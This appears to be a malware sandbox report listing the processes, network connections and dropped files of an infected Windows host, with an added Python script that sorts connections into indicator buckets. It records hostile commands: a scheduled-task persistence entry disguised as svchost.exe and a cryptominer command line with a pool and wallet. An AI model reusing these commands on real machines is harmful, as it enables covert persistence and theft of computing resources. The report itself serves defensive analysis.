C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 3 -isForBrowser -prefsHandle 5432 -prefMapHandle 5372 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fda17f0-70c8-4bfb-a81c-51c26cf43076} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 4 -isForBrowser -prefsHandle 5568 -prefMapHandle 5432 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ef5b24b-4793-477c-9b6e-c2cf8a66ecd3} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5748 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {628cb62d-0bdc-463f-8abf-d03bea636aed} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\1000029002\e378e7234d.exe

"C:\Users\Admin\1000029002\e378e7234d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5556 -ip 5556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1116

C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\f0762e5cc7.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe

"C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

clamer.exe -priverdD

C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"

C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\ProgramData\kcsnc\glhe.exe

C:\ProgramData\kcsnc\glhe.exe

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe

"C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 71261C620F8E184C4A94934EE9CCDB8E

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 382CA91FCAA1BC78776CDC3148915326 E Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && "C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && rmdir /S /Q DLLs Lib"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=220,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1936 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
RU 185.215.113.19:80 185.215.113.19 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 216.58.214.174:443 www.youtube.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
FR 216.58.214.78:443 www.youtube.com tcp
FR 216.58.214.78:443 www.youtube.com tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
FR 216.58.214.174:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 174.214.58.216.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
FR 216.58.214.78:443 youtube-ui.l.google.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 78.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com udp
N/A 127.0.0.1:57307 tcp
FR 172.217.20.196:443 www.google.com tcp
FR 172.217.20.196:443 www.google.com tcp
N/A 127.0.0.1:57322 tcp
N/A 224.0.0.251:5353 udp
RU 85.28.47.31:80 85.28.47.31 tcp
US 8.8.8.8:53 31.47.28.85.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 216.58.214.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 216.58.214.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.233:443 r4---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.233:443 r4.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 233.168.125.74.in-addr.arpa udp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 111.240.92.91.in-addr.arpa udp
NL 91.92.240.111:1334 91.92.240.111 tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 174.201.250.142.in-addr.arpa udp
FR 142.250.201.174:443 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
FR 142.250.201.174:443 play.google.com tcp
NL 91.92.240.111:80 91.92.240.111 tcp
CH 185.196.9.187:80 185.196.9.187 tcp
US 8.8.8.8:53 187.9.196.185.in-addr.arpa udp
CA 51.222.21.20:4782 tcp
US 8.8.8.8:53 ipwho.is udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 20.21.222.51.in-addr.arpa udp
DE 195.201.57.90:443 ipwho.is tcp
NL 91.92.240.111:39001 tcp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
FR 172.217.18.206:443 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
NL 185.43.220.45:4000 claywyaeropumps.com tcp
NL 185.43.220.45:4376 claywyaeropumps.com tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 smtp.gmail.com udp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 8.8.8.8:53 108.193.125.74.in-addr.arpa udp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 8.8.8.8:53 cardinalhealth.com udp
US 35.186.192.226:587 cardinalhealth.com tcp
US 8.8.8.8:53 smtp.tim.it udp
NL 34.141.221.156:587 smtp.tim.it tcp
US 8.8.8.8:53 store.steampowered.com udp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 136.193.25.184.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
GB 184.25.193.136:443 store.steampowered.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 imap.lycos.de udp
US 8.8.8.8:53 smtp.mail.yahoo.com udp
IE 87.248.97.36:465 smtp.mail.yahoo.com tcp
US 209.202.254.90:587 imap.lycos.de tcp
US 8.8.8.8:53 smtp.laposte.net udp
FR 160.92.124.65:465 smtp.laposte.net tcp
US 8.8.8.8:53 36.97.248.87.in-addr.arpa udp
IE 74.125.193.108:465 smtp.gmail.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 65.124.92.160.in-addr.arpa udp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 smtp.comcast.net udp
US 96.102.167.164:465 smtp.comcast.net tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 164.167.102.96.in-addr.arpa udp
N/A 127.0.0.1:465 tcp
FR 172.217.18.206:443 consent.youtube.com udp
GB 23.214.143.155:443 api.steampowered.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 smtp.comcast.net udp
US 96.102.18.196:465 smtp.comcast.net tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 196.18.102.96.in-addr.arpa udp
US 8.8.8.8:53 smtpout.secureserver.net udp
FR 92.204.80.1:465 smtpout.secureserver.net tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 8.8.8.8:53 store.steampowered.com udp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 85.99.22.2.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
FR 188.165.208.154:80 honipsiops.in tcp
US 8.8.8.8:53 honipsiops.in udp
IE 74.125.193.108:465 smtp.gmail.com tcp
FR 188.165.208.154:80 honipsiops.in tcp
US 8.8.8.8:53 mahaska.org udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 198.49.23.145:587 mahaska.org tcp
US 8.8.8.8:53 154.208.165.188.in-addr.arpa udp
IE 74.125.193.108:465 smtp.gmail.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 8.8.8.8:53 auth.adguard.com udp
US 104.18.163.229:443 auth.adguard.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
US 8.8.8.8:53 229.163.18.104.in-addr.arpa udp
US 104.18.163.229:443 auth.adguard.com tcp
US 8.8.8.8:53 sasktel.net udp
CA 142.164.252.42:465 sasktel.net tcp
GB 2.22.99.85:443 steamcommunity.com tcp
US 8.8.8.8:53 smtp.orange.fr udp
FR 80.12.26.33:465 smtp.orange.fr tcp
US 8.8.8.8:53 33.26.12.80.in-addr.arpa udp
US 104.18.163.229:443 auth.adguard.com tcp
GB 23.214.143.155:443 api.steampowered.com tcp
US 104.18.163.229:443 auth.adguard.com tcp
US 8.8.8.8:53 smtp.aol.com udp
IE 87.248.97.31:25 smtp.aol.com tcp
GB 184.25.193.136:443 store.steampowered.com tcp
US 104.18.163.229:443 auth.adguard.com tcp
US 8.8.8.8:53 mx1.datacomm.ch udp
CH 212.40.2.32:465 mx1.datacomm.ch tcp
GB 2.22.99.85:443 tcp
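The connection listing above mixes sandbox noise (reverse lookups of every peer, the browser's Mozilla and Google telemetry) with the indicators that matter: plain HTTP to literal IPs, a Stratum-style port 3333 session to a mining pool hostname, a TCP session on Quasar's default port 4782, "what is my IP" lookups, and a burst of SMTP sessions to many unrelated mail providers (stealers validate harvested mail credentials that way). The following Python is an added triage helper, not part of the sandbox report or of any of the malware families it names. Its bucket rules (the geolocation-service and mining-pool hostnames, the SMTP burst threshold, treating 4782 as the Quasar default port) are heuristics assumed for the example, and the embedded log is a constructed subset of the lines above.

```python
"""Triage a sandbox network-connection listing into IOC buckets.

Input lines have the shape: "<CC> <ip>:<port> [<hostname>] <tcp|udp>".
"""
import re
from collections import defaultdict

# Constructed sample: a few connection lines copied from the listing above.
SAMPLE_LOG = """\
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 www.youtube.com udp
FR 216.58.214.174:443 www.youtube.com tcp
NL 91.92.240.111:1334 91.92.240.111 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
CA 51.222.21.20:4782 tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
IE 74.125.193.108:465 smtp.gmail.com tcp
US 35.186.192.226:587 cardinalhealth.com tcp
IE 87.248.97.31:25 smtp.aol.com tcp
N/A 127.0.0.1:57307 tcp
"""

LINE_RE = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<host>\S+))?\s+(?P<proto>tcp|udp)$"
)

# Heuristic tables (assumptions for this example, not taken from the report).
SMTP_PORTS = {25, 465, 587}
GEOIP_HOSTS = {"api.ip.sb", "ipwho.is"}      # public "what is my IP" services
MINING_POOL_HINTS = ("unmineable",)          # substring match on the hostname
QUASAR_DEFAULT_PORT = 4782                   # Quasar RAT's default listener port


def parse_line(line):
    """Return a dict for one connection line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["host"] = rec["host"] or ""
    return rec


def classify(rec):
    """Map one parsed connection to a triage bucket."""
    ip, port, host = rec["ip"], rec["port"], rec["host"]
    if ip == "8.8.8.8" and port == 53:
        # Reverse lookups of every peer are sandbox noise, not sample behaviour.
        return "dns_reverse" if host.endswith(".in-addr.arpa") else "dns_query"
    if ip.startswith("127.") or ip.startswith("224."):
        return "local"
    if host in GEOIP_HOSTS:
        return "geoip_check"
    if port == 3333 and any(h in host for h in MINING_POOL_HINTS):
        return "mining_pool"
    if port in SMTP_PORTS:
        return "smtp"
    if port == QUASAR_DEFAULT_PORT:
        return "quasar_default_port"
    if host == ip:
        # Plain HTTP straight to a literal IP: typical loader/C2 check-in.
        return "raw_ip"
    if port not in (80, 443):
        return "nonstandard_port"
    return "web"


def triage(text):
    """Group unique ip:port endpoints by bucket; skip unparseable lines."""
    buckets = defaultdict(set)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        buckets[classify(rec)].add(f"{rec['ip']}:{rec['port']}")
    return {k: sorted(v) for k, v in buckets.items()}


def smtp_validation_burst(text, threshold=3):
    """True when the sample talks to >= threshold distinct mail servers:
    stealers test harvested mail credentials this way (heuristic)."""
    hosts = {r["host"] for r in map(parse_line, text.splitlines())
             if r and r["port"] in SMTP_PORTS}
    return len(hosts) >= threshold


if __name__ == "__main__":
    for bucket, endpoints in sorted(triage(SAMPLE_LOG).items()):
        print(f"{bucket:20} {', '.join(endpoints)}")
    print("smtp credential-validation burst:", smtp_validation_burst(SAMPLE_LOG))
```

Paste the full listing into SAMPLE_LOG (or read it from a file) and the raw_ip, nonstandard_port, quasar_default_port and mining_pool buckets become the blocklist candidates; the dns_reverse and web buckets are what to discard before sharing IOCs, since they are mostly the sandbox's own resolver and the bundled browser phoning home.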

Files

memory/3012-0-0x0000000000340000-0x00000000007EA000-memory.dmp

memory/3012-1-0x0000000076FE4000-0x0000000076FE6000-memory.dmp

memory/3012-2-0x0000000000341000-0x000000000036F000-memory.dmp

memory/3012-3-0x0000000000340000-0x00000000007EA000-memory.dmp

memory/3012-4-0x0000000000340000-0x00000000007EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 5513ba120b37a0384b2beaac145cea34
SHA1 265914c39c9709afe425f1b95bc7059b43cd1578
SHA256 f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce
SHA512 7ec94f417aa2cfbe2cf96e4b617e4f9052b555ea19fc9d0ca74340ce243101acfcb6c225e02e8341f1165d94e4cee97862c50985c433340f34356c989fcbd484

memory/3012-17-0x0000000000340000-0x00000000007EA000-memory.dmp

memory/3900-16-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/3900-18-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/3900-19-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/3900-20-0x0000000000220000-0x00000000006CA000-memory.dmp

memory/3900-21-0x0000000000220000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe

MD5 f19f62959c79af73e6353063cfab9482
SHA1 8f62871b4c9a2ab35033561e4dc0d478e629391a
SHA256 bafb29d6c0e54ea3dc758787b59dd494d24bc0d96806c8569fb2d026e2c50c65
SHA512 46cb00fbf95292c7ed2c3603a9be660b1fb35de1f6f8bf34b6e2131ec8c140e6b5df5e22a582a35e7cbe71c0aedaa1b3d7e532d3bf82f7148e25a8f8d22a28ed

C:\Users\Admin\AppData\Local\Temp\600E.tmp\600F.tmp\6010.bat

